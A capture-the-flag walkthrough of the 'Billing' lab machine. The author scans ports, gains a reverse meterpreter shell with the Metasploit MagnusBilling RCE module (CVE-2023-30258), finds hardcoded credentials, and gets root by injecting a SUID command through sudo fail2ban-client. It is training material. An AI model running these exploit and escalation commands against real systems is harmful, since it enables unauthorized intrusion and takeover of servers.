Billing
This machine is very straight forward based on public exploit.
Billing
Port Scan Results ⤵️
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
└─$ nmap -sC -sV -p- -vv -T4 -oN Nmap_Result.txt -Pn 10.10.226.90
Nmap scan report for 10.10.226.90
Host is up, received user-set (0.18s latency).
Scanned at 2025-07-02 09:50:05 IST for 937s
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 60 OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey:
| 256 13:bc:7f:98:f9:57:c9:ab:24:d7:00:cc:a1:59:23:2c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIWF/On67zCq6GGvkZUxDq/mKNpHA8UeSv1rFe8i1SB8wkCtb0iemRkFrVwC21Mf1sNMvB9N0TLAZyBSYWt1j3Y=
| 256 2a:ee:b1:f1:01:d6:82:4e:38:6e:18:c6:18:21:8a:af (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOfpESvwN8hhhH5DF9zJKecTTjdeVNcwkqG20KodAOeG
80/tcp open http syn-ack ttl 60 Apache httpd 2.4.62 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/mbilling/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.62 (Debian)
| http-title: MagnusBilling
|_Requested resource was http://10.10.226.90/mbilling/
1077/tcp filtered imgames no-response
3306/tcp open mysql syn-ack ttl 60 MariaDB 10.3.23 or earlier (unauthorized)
5038/tcp open asterisk syn-ack ttl 60 Asterisk Call Manager 2.10.6
11210/tcp filtered unknown no-response
17518/tcp filtered unknown no-response
18612/tcp filtered unknown no-response
18646/tcp filtered unknown no-response
25824/tcp filtered unknown no-response
29693/tcp filtered unknown no-response
59421/tcp filtered unknown no-response
60875/tcp filtered unknown no-response
60967/tcp filtered unknown no-response
62797/tcp filtered unknown no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Web Enumeration ⤵️
Lets check port 80and enumerate from there 🔻
Webpage is redirected to /mbillling/ site
Now I know with port scan that a service is running named as Asterisk Call Manager 2.10.6 on port 5038 after some exploit enumeration I got that this manager have a unauthorized login bypass though Metasploit-framework exploit.
Lets use that exploit to gain access 🔻
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
└─$ msfconsole -q
msf6 > use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > options
Module options (exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: s
ocks5, socks5h, sapni, http, socks4
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/u
sing-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /mbilling yes The MagnusBilling endpoint URL
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the loc
al machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
When TARGET is 0:
Name Current Setting Required Description
---- --------------- -------- -----------
WEBSHELL no The name of the webshell with extension. Webshell name will be randomly generated i
f left unset.
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 PHP
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set LHOST tun0
LHOST => 10.17.58.140
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set RHOSTS 10.10.226.90
RHOSTS => 10.10.226.90
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run
[*] Started reverse TCP handler on 10.17.58.140:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 10.10.226.90:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 4 seconds.
[*] Elapsed time: 4.42 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (40004 bytes) to 10.10.226.90
[+] Deleted vrAxIbtYSJCwHJ.php
[*] Meterpreter session 1 opened (10.17.58.140:4444 -> 10.10.226.90:43714) at 2025-07-02 10:01:00 +0530
meterpreter > getguid
[+] Session GUID: ca0b7ce1-de7c-4d2e-bbe9-4d1e5dfbbea1
meterpreter > getuid
Server username: asterisk
meterpreter > id
[-] Unknown command: id. Run the help command for more details.
meterpreter > shell
Process 2420 created.
Channel 0 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
asterisk@ip-10-10-226-90:/var/www/html/mbilling/lib/icepay$ ls -al
ls -al
total 80
drwxr-xr-x 2 asterisk asterisk 4096 Jul 1 19:31 .
drwx------ 9 asterisk asterisk 4096 Feb 27 2024 ..
-rwx------ 1 asterisk asterisk 768 Feb 27 2024 icepay-cc.php
-rwx------ 1 asterisk asterisk 733 Feb 27 2024 icepay-ddebit.php
-rwx------ 1 asterisk asterisk 736 Feb 27 2024 icepay-directebank.php
-rwx------ 1 asterisk asterisk 730 Feb 27 2024 icepay-giropay.php
-rwx------ 1 asterisk asterisk 671 Feb 27 2024 icepay-ideal.php
-rwx------ 1 asterisk asterisk 720 Feb 27 2024 icepay-mistercash.php
-rwx------ 1 asterisk asterisk 710 Feb 27 2024 icepay-paypal.php
-rwx------ 1 asterisk asterisk 699 Feb 27 2024 icepay-paysafecard.php
-rwx------ 1 asterisk asterisk 727 Feb 27 2024 icepay-phone.php
-rwx------ 1 asterisk asterisk 723 Feb 27 2024 icepay-sms.php
-rwx------ 1 asterisk asterisk 699 Feb 27 2024 icepay-wire.php
-rwx------ 1 asterisk asterisk 25097 Mar 27 2024 icepay.php
-rw-r--r-- 1 asterisk asterisk 0 Sep 13 2024 null
asterisk@ip-10-10-226-90:/var/www/html/mbilling/lib/icepay$
Now I got into the machine with asterisk user so lets find some files or credentials also check for whether this user is in sudoers list or not with sudo -l command that can lets me escalate further into another high privileged user or root user.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
asterisk@ip-10-10-226-90 $ cat /var/www/html/mbilling/protected/components/AsteriskAccess.php
<?php
/**
* Classe de com funcionalidades globais
*
* MagnusBilling <info@magnusbilling.com>
* 08/06/2013
*/
class AsteriskAccess
{
private $asmanager;
private static $instance;
private static $config;
public static function instance($host = 'localhost', $user = 'magnus', $pass = 'magnussolution')
{
if (is_null(self::$instance)) {
self::$instance = new AsteriskAccess();
}
self::$instance->connectAsterisk($host, $user, $pass);
return self::$instance;
}
I get a username and password here 🔻
1
magnus : magnussolution
But I was able to execute sudo -l command, see this 🔻
1
2
3
4
5
6
7
8
9
10
11
12
asterisk@ip-10-10-166-6:/home$ sudo -l
sudo -l
Matching Defaults entries for asterisk on ip-10-10-166-6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for asterisk:
Defaults!/usr/bin/fail2ban-client !requiretty
User asterisk may run the following commands on ip-10-10-166-6:
(ALL) NOPASSWD: /usr/bin/fail2ban-client
asterisk@ip-10-10-166-6:/home$
I need to find a way to execute fail2ban-client command to execute some commands on root users behalf so for that I found one vulnerability that lets me execute that command like this 🔻
Step-by-Step Process:
- Check sudo permissions: Ensures the user has the ability to run
fail2ban-clientas root. - Restart Fail2Ban: Executes
sudo /usr/bin/fail2ban-client restartto refresh the service. - Inject Malicious Action: Uses
fail2ban-client setto replace an existing action with a command that give a SUID permission to bash- Command used:
1
sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'chmod u+s /bin/bash'"
- Command used:
- Ban Localhost (127.0.0.1): Triggers the malicious action by banning an IP, effectively executing the injected command.
- Command used:
1
sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1
- Command used:
- Verify File Extraction: Checks if
/bin/bashgot SUID permssion or not.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
asterisk@ip-10-10-166-6:/home$ ls -al /bin/bash
ls -al /bin/bash
-rwxr-xr-x 1 root root 1265648 Apr 18 13:47 /bin/bash
asterisk@ip-10-10-166-6:/home$
asterisk@ip-10-10-166-6:/home$ sudo /usr/bin/fail2ban-client restart
sudo /usr/bin/fail2ban-client restart
Shutdown successful
2025-07-01 20:17:57,140 fail2ban.configreader [3224]: WARNING 'allowipv6' not defined in 'Definition'. Using default one: 'auto'
Server ready
asterisk@ip-10-10-166-6:/home$
asterisk@ip-10-10-166-6:/home$
asterisk@ip-10-10-166-6:/home$sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'chmod u+s /bin/bash'"
sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'chmod u+s /bin/bash'"
/bin/bash -c 'chmod u+s /bin/bash'
asterisk@ip-10-10-166-6:/home$
asterisk@ip-10-10-166-6:/home$
asterisk@ip-10-10-166-6:/home$
asterisk@ip-10-10-166-6:/home$sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1
sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1
1
asterisk@ip-10-10-166-6:/home$
asterisk@ip-10-10-166-6:/home$
asterisk@ip-10-10-166-6:/home$
asterisk@ip-10-10-166-6:/home$sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'chmod u+s /bin/bash'"
sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'chmod u+s /bin/bash'"
/bin/bash -c 'chmod u+s /bin/bash'
asterisk@ip-10-10-166-6:/home$
asterisk@ip-10-10-166-6:/home$
asterisk@ip-10-10-166-6:/home$ls -al /bin/bash
ls -al /bin/bash
-rwsr-xr-x 1 root root 1265648 Apr 18 13:47 /bin/bash
asterisk@ip-10-10-166-6:/home$
I got the bash shell as SUID permitted so, lets have EUID root shell 🔻
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
asterisk@ip-10-10-166-6:/home$ ls -al /bin/bash
ls -al /bin/bash
-rwsr-xr-x 1 root root 1265648 Apr 18 13:47 /bin/bash
asterisk@ip-10-10-166-6:/home$ /bin/bash -p
/bin/bash -p
bash-5.2# whoami
whoami
root
bash-5.2# id
id
uid=1001(asterisk) gid=1001(asterisk) euid=0(root) groups=1001(asterisk)
bash-5.2# cd /root
cd /root
bash-5.2# ls -al
ls -al
total 60
drwx------ 7 root root 4096 May 28 13:01 .
drwxr-xr-x 19 root root 4096 Jul 1 19:42 ..
lrwxrwxrwx 1 root root 9 Mar 27 2024 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
drwx------ 3 root root 4096 Mar 27 2024 .cache
drwx------ 3 root root 4096 Mar 30 2024 .gnupg
-rw------- 1 root root 20 May 28 13:01 .lesshst
drwxr-xr-x 3 root root 4096 Mar 27 2024 .local
lrwxrwxrwx 1 root root 9 Mar 27 2024 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
drwxr-xr-x 2 root root 4096 May 28 12:33 .ssh
drwxr-xr-x 3 root root 4096 Mar 27 2024 .subversion
-rw------- 1 root root 1223 May 28 12:34 .viminfo
-rw-r--r-- 1 root root 180 Mar 27 2024 .wget-hsts
-rw-r--r-- 1 root root 1 Mar 31 2024 filename
-rw-r--r-- 1 root root 17 Mar 27 2024 passwordMysql.log
-rw-r--r-- 1 root root 38 Mar 27 2024 root.txt
bash-5.2# cat root.txt
cat root.txt
THM{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
bash-5.2# cd /home/magnus/user.tx
cd /home/magnus/user.tx
bash: cd: /home/magnus/user.tx: No such file or directory
bash-5.2# cat /home/magnus/user.txt
cat /home/magnus/user.txt
THM{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
bash-5.2#
I am root now !!
If you have any questions or suggestions, please leave a comment below. Thank You !
This post is licensed under CC BY 4.0 by the author.